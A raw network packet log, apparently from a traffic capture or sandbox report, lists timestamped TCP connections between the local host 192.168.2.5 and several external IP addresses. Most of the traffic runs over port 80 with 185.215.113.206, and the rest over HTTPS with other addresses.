Nov 13, 2024 20:39:51.566714048 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.566731930 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.566744089 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.566768885 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.566777945 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.566881895 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.566881895 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.566881895 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.571199894 CET	49962	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.571233034 CET	443	49962	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.615632057 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.615648985 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.615659952 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.615716934 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.615726948 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.615823984 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.615823984 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.615823984 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.615823984 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.615856886 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.615869045 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.615878105 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.615891933 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.615901947 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.615911961 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.615921974 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.615932941 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.615953922 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.615953922 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.615953922 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.615982056 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.615997076 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616013050 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616027117 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616034031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616044998 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616056919 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616069078 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616081953 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616082907 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.616094112 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616106987 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616108894 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.616110086 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.616127014 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616138935 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.616141081 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616161108 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616163015 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.616178036 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616189003 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.616194963 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616209030 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616221905 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616225004 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.616235018 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616249084 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616249084 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.616261959 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616275072 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.616275072 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.616276979 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616298914 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.616326094 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.616770029 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616782904 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616796017 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616807938 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616821051 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616826057 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.616826057 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.616835117 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616847038 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.616849899 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.616877079 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.616906881 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.617523909 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.617537022 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.617549896 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.617563009 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.617588997 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.617588997 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.617616892 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.667174101 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.667211056 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.667249918 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.667268991 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.667300940 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.667341948 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.667341948 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.672745943 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.677622080 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.685224056 CET	443	49948	52.178.17.2	192.168.2.5
Nov 13, 2024 20:39:51.685864925 CET	49948	443	192.168.2.5	52.178.17.2
Nov 13, 2024 20:39:51.685928106 CET	443	49948	52.178.17.2	192.168.2.5
Nov 13, 2024 20:39:51.685995102 CET	49948	443	192.168.2.5	52.178.17.2
Nov 13, 2024 20:39:51.782672882 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.782711983 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.782797098 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.782850981 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.782876015 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.782896042 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.803247929 CET	443	49964	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:51.803550959 CET	49964	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:51.803600073 CET	443	49964	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:51.803986073 CET	443	49964	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:51.804368019 CET	49964	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:51.804438114 CET	443	49964	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:51.804578066 CET	49964	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:51.847337961 CET	443	49964	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:51.898121119 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.898145914 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.898231030 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.898272038 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.898333073 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.941334009 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.941406965 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.941412926 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.941617012 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.941751003 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:51.941771984 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:51.952503920 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.952538013 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.952549934 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.952584982 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.952598095 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.952609062 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.952621937 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.952636003 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.952683926 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.952694893 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.952709913 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.952709913 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.952709913 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.952709913 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.952711105 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.952810049 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.952810049 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.952913046 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.952924013 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.952939034 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.952951908 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.952963114 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.952979088 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.952979088 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.953011036 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.953402042 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.953413963 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.953429937 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.953476906 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.953476906 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.953608990 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.953620911 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.953666925 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.953738928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.953751087 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.953792095 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.953792095 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.953818083 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.953830004 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.953844070 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.953856945 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.953862906 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.953871012 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.953885078 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.953897953 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.953921080 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.953922033 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.953934908 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.953972101 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.953973055 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.954158068 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.954170942 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.954183102 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.954195023 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.954209089 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.954220057 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.954221964 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.954245090 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.954252005 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.954265118 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.954272032 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.954286098 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.954291105 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.954298019 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.954315901 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.954318047 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.954332113 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.954343081 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.954343081 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.954345942 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.954358101 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.954363108 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.954380035 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.954401970 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.015649080 CET	443	49964	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:52.015912056 CET	443	49964	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:52.015999079 CET	49964	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:52.018135071 CET	49964	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:52.018188953 CET	443	49964	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:52.031528950 CET	443	49963	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:52.031626940 CET	49963	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:52.034878969 CET	49963	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:52.034908056 CET	443	49963	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:52.035221100 CET	443	49963	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:52.037122965 CET	49963	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:52.037193060 CET	49963	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:52.037218094 CET	443	49963	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:52.037293911 CET	49963	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:52.060125113 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.060592890 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.060616016 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.061069965 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.061454058 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.061587095 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.061639071 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.073178053 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073224068 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073235989 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073245049 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.073249102 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073288918 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.073288918 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.073369026 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073379993 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073393106 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073405027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073412895 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.073417902 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073431015 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073438883 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.073445082 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073487043 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.073487043 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.073498011 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073508978 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073523045 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073535919 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073548079 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.073558092 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.073580027 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.073646069 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073657990 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073669910 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073682070 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073693037 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073695898 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.073705912 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073717117 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073724031 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.073728085 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073739052 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.073743105 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073756933 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073764086 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.073771000 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.073797941 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.073816061 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.074023008 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074067116 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074079037 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074090958 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074101925 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074110031 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.074115992 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074130058 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074140072 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074145079 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.074153900 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074163914 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.074163914 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074177980 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074179888 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.074208021 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074208021 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.074219942 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074232101 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074240923 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.074249983 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074260950 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074266911 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.074271917 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074284077 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074291945 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.074295998 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074307919 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074309111 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.074321985 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074331999 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.074331999 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074345112 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074357033 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074362040 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.074368954 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074382067 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074382067 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.074395895 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074398994 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.074407101 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.074415922 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.074440002 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.075568914 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.075581074 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.075592041 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.075602055 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.075613976 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.075619936 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.075628042 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.075639963 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.075654030 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.075656891 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.075665951 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.075670004 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.075679064 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.075690985 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.075696945 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.075705051 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.075717926 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.075725079 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.075730085 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.075753927 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.075776100 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.079338074 CET	443	49963	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:52.095772982 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.098185062 CET	49970	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.098207951 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.098577023 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.099085093 CET	49970	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.099148989 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.099359035 CET	49970	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.103338003 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.120872974 CET	49975	443	192.168.2.5	23.222.241.134
Nov 13, 2024 20:39:52.120907068 CET	443	49975	23.222.241.134	192.168.2.5
Nov 13, 2024 20:39:52.121052980 CET	49975	443	192.168.2.5	23.222.241.134
Nov 13, 2024 20:39:52.121697903 CET	49976	443	192.168.2.5	23.222.241.134
Nov 13, 2024 20:39:52.121735096 CET	443	49976	23.222.241.134	192.168.2.5
Nov 13, 2024 20:39:52.121784925 CET	49976	443	192.168.2.5	23.222.241.134
Nov 13, 2024 20:39:52.122320890 CET	49977	443	192.168.2.5	204.79.197.219
Nov 13, 2024 20:39:52.122330904 CET	443	49977	204.79.197.219	192.168.2.5
Nov 13, 2024 20:39:52.122396946 CET	49977	443	192.168.2.5	204.79.197.219
